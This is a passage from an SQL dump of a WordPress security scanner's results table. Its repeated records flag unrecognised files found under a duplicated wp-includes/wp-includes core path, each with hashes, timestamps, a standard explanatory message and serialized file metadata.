More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/css/wp-pointer.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26902,1631424883,1631424883,'new','knownfile',75,'0baa74ba8018bcb6bacf24346034398a','8c0d473a2c02f4fe93b34fe5448cc352','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-background-image-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:81:\"wp-includes/wp-includes/customize/class-wp-customize-background-image-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26903,1631424883,1631424883,'new','knownfile',75,'0e9002feca4fcd39851a20bacf2b7d53','e2964a460bb4a7666f36381394759ba3','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-background-image-setting.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:81:\"wp-includes/wp-includes/customize/class-wp-customize-background-image-setting.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26904,1631424883,1631424883,'new','knownfile',75,'17fce30c3092739b8cd17082c3ae8eff','9a8027e662384e0694ed558d8c9725a0','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-background-position-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:84:\"wp-includes/wp-includes/customize/class-wp-customize-background-position-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26905,1631424883,1631424883,'new','knownfile',75,'200c11ffca2bd6ecac12554291e68ac6','f734d8b64334203a04b05f124644dfe0','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-code-editor-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:76:\"wp-includes/wp-includes/customize/class-wp-customize-code-editor-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26906,1631424883,1631424883,'new','knownfile',75,'1c058a105bd3e3b70e9fb39655621f52','e11c536d66badc3921e2ebaa6c3804cd','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-color-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:70:\"wp-includes/wp-includes/customize/class-wp-customize-color-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26907,1631424883,1631424883,'new','knownfile',75,'c2dfbd83f54fc21dddeb889b33d642fb','de9539813ab19346ffd86ade21ae31cf','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-cropped-image-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:78:\"wp-includes/wp-includes/customize/class-wp-customize-cropped-image-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26908,1631424883,1631424883,'new','knownfile',75,'16cc63395efd580c595a5e81aefb1283','617a20728ff325807f433f147d54c4e8','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-custom-css-setting.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:75:\"wp-includes/wp-includes/customize/class-wp-customize-custom-css-setting.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26909,1631424883,1631424883,'new','knownfile',75,'61a2ab1fc5449eea6264f581bdb0bcd6','9625b8ef659c2fa5d3c3a10a7813debc','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-date-time-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:74:\"wp-includes/wp-includes/customize/class-wp-customize-date-time-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26910,1631424884,1631424884,'new','knownfile',75,'e2e1ce854cc101c2bda016bc7efc1bd0','608fe7707e764fb0d045fa78e6eb35ac','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-filter-setting.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:71:\"wp-includes/wp-includes/customize/class-wp-customize-filter-setting.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26911,1631424884,1631424884,'new','knownfile',75,'dd2befdf77d2284d7b2526a60c757013','c6cdac312f5d7fb65321829d0a174869','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-header-image-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:77:\"wp-includes/wp-includes/customize/class-wp-customize-header-image-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26912,1631424884,1631424884,'new','knownfile',75,'c66e85a4f1a8da928646b6f23faf865a','0bd25cc07376ce7f23ef59b022205652','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-header-image-setting.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:77:\"wp-includes/wp-includes/customize/class-wp-customize-header-image-setting.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26913,1631424884,1631424884,'new','knownfile',75,'f28b1ad7753e45de9ecc509951e3e07b','24af6e7f98ab60e148ca3e1a1efdba49','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-image-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:70:\"wp-includes/wp-includes/customize/class-wp-customize-image-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26914,1631424884,1631424884,'new','knownfile',75,'1c856bb3c04c7a0ab24729104e357e73','2cd55236b515eb0d2d67d120016b83f0','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-media-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:70:\"wp-includes/wp-includes/customize/class-wp-customize-media-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26915,1631424884,1631424884,'new','knownfile',75,'e5f2591df261567283863166953e12bc','db8ae254a910f8e8018a5f18318331f4','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-nav-menu-auto-add-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:82:\"wp-includes/wp-includes/customize/class-wp-customize-nav-menu-auto-add-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26916,1631424884,1631424884,'new','knownfile',75,'e3914da47907028622869ed7e37a2378','79bc3cffe7302d75a99ba3be6b3a4e71','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-nav-menu-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:73:\"wp-includes/wp-includes/customize/class-wp-customize-nav-menu-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26917,1631424884,1631424884,'new','knownfile',75,'b27b6ed07c6c25c2331617e2141c4991','139c8773e435c98b2f22fec0dbdf9a69','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-nav-menu-item-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:78:\"wp-includes/wp-includes/customize/class-wp-customize-nav-menu-item-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26918,1631424884,1631424884,'new','knownfile',75,'656f02f63ef60b96f355969c60fafc77','d51a45fcc23a1fa623c869387033077d','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-nav-menu-item-setting.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:78:\"wp-includes/wp-includes/customize/class-wp-customize-nav-menu-item-setting.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26919,1631424884,1631424884,'new','knownfile',75,'27528309b2c7cd1ef1a3900f4f0d3b98','5762f4f954f8777edcb0c5cf9e92384c','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-nav-menu-location-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:82:\"wp-includes/wp-includes/customize/class-wp-customize-nav-menu-location-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26920,1631424884,1631424884,'new','knownfile',75,'a79b2d67b9d9c4079f60344190a6ed1c','2a111821a3d0e8bda74819be5a5a1d21','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-nav-menu-locations-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:83:\"wp-includes/wp-includes/customize/class-wp-customize-nav-menu-locations-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26921,1631424884,1631424884,'new','knownfile',75,'03e9cf5ef8c3d18840773af7e7b1f69e','12a5863706a030eb45edfaf2fa1371d1','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-nav-menu-name-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:78:\"wp-includes/wp-includes/customize/class-wp-customize-nav-menu-name-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26922,1631424884,1631424884,'new','knownfile',75,'ea0fd5fe8342e8092f7304910ebe9780','8b5da127b56861b3b23256a4385b0fd4','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-nav-menu-section.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:73:\"wp-includes/wp-includes/customize/class-wp-customize-nav-menu-section.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26923,1631424884,1631424884,'new','knownfile',75,'571b27f4af027769e9bb771241355595','37cc82269c8c65ce4fe4fdc07d16c54f','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-nav-menu-setting.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:73:\"wp-includes/wp-includes/customize/class-wp-customize-nav-menu-setting.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26924,1631424884,1631424884,'new','knownfile',75,'b40eef292aa94aea593a4b96d8f9199b','e318a5309cce42fa0218f439aca95ec4','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-nav-menus-panel.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:72:\"wp-includes/wp-includes/customize/class-wp-customize-nav-menus-panel.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26925,1631424885,1631424885,'new','knownfile',75,'8214b3fd260f0956f70f6ad2f834bc9a','e3ff681fc1dd8a74eb633589d60b0ad4','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-new-menu-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:73:\"wp-includes/wp-includes/customize/class-wp-customize-new-menu-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26926,1631424885,1631424885,'new','knownfile',75,'c4f0d1d332f53267db22cd98b01b1c6e','21e953c70d9bdb8766ccacda812d300a','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-new-menu-section.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:73:\"wp-includes/wp-includes/customize/class-wp-customize-new-menu-section.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26927,1631424885,1631424885,'new','knownfile',75,'38fe581e1d3e77f1f63be7ea6a3df951','2ccfe6e0e5ea3181de1c6f927679e980','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-partial.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:64:\"wp-includes/wp-includes/customize/class-wp-customize-partial.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26928,1631424885,1631424885,'new','knownfile',75,'e6463b608cfea23d00f5155fd357645f','c89ce73f11f584f14de63e33aba25b6c','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-selective-refresh.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:74:\"wp-includes/wp-includes/customize/class-wp-customize-selective-refresh.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26929,1631424885,1631424885,'new','knownfile',75,'8224e2952ce77de2e96b49e2af9ec746','8f7f0858acada66bd0023daa14ee2152','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-sidebar-section.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:72:\"wp-includes/wp-includes/customize/class-wp-customize-sidebar-section.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26930,1631424885,1631424885,'new','knownfile',75,'a10a6aa05e33f8495e4ae9d311d1020c','024dda876c5dbd9c1e988b0bbc41a74b','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-site-icon-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:74:\"wp-includes/wp-includes/customize/class-wp-customize-site-icon-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26931,1631424885,1631424885,'new','knownfile',75,'5f908d461bf00e1e121a26c2f9f99bb8','95cb6a8a2f149ed9c2df42c4546becf5','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-theme-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:70:\"wp-includes/wp-includes/customize/class-wp-customize-theme-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26932,1631424885,1631424885,'new','knownfile',75,'6e69abaaf829533160ea3956980b2c11','f9030ea3b7a6285f0c8505c63580253f','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-themes-panel.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:69:\"wp-includes/wp-includes/customize/class-wp-customize-themes-panel.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26933,1631424885,1631424885,'new','knownfile',75,'195a5e425d9ecfe9e5c2d23f280c1574','89a9adbca0f00458122e523315ac50fb','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-themes-section.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:71:\"wp-includes/wp-includes/customize/class-wp-customize-themes-section.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26934,1631424885,1631424885,'new','knownfile',75,'f2f3f4316ce08a39a736afa21a05c9ad','520b2b3f68eba47ec1401c8728b59244','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-upload-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:71:\"wp-includes/wp-includes/customize/class-wp-customize-upload-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26935,1631424886,1631424886,'new','knownfile',75,'8aebe102ca83c9ba9f23a10210370468','860487125e56667f703f442b9c1c797d','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-widget-area-customize-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:76:\"wp-includes/wp-includes/customize/class-wp-widget-area-customize-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26936,1631424886,1631424886,'new','knownfile',75,'a5ea1a9e860646412f3303885309ee64','d0936f6da81414cad0e86831b3b8da75','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-widget-form-customize-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:76:\"wp-includes/wp-includes/customize/class-wp-widget-form-customize-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26937,1631424886,1631424886,'new','knownfile',75,'e172f3b1d20ab40c5d01065d274253d2','eebc29b061a88ac2195ceaa5629a3ed7','Unknown file in WordPress core: wp-includes/wp-includes/date.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:32:\"wp-includes/wp-includes/date.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26938,1631424886,1631424886,'new','knownfile',75,'002344d295c2a9c9bb9d6da4dc045f0c','b074eb615faafe06f93a0068a775eedd','Unknown file in WordPress core: wp-includes/wp-includes/default-constants.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/default-constants.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26939,1631424886,1631424886,'new','knownfile',75,'dc4a7dc2bfc56c7b6ada4afb121eccb7','9f5f712590d7a9e046aaea38adf59706','Unknown file in WordPress core: wp-includes/wp-includes/default-filters.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/default-filters.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26940,1631424886,1631424886,'new','knownfile',75,'1cbf7cc6a6c53344a3990f1511db9a11','e277bb45841e468950a1b17de0ea3504','Unknown file in WordPress core: wp-includes/wp-includes/default-widgets.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn 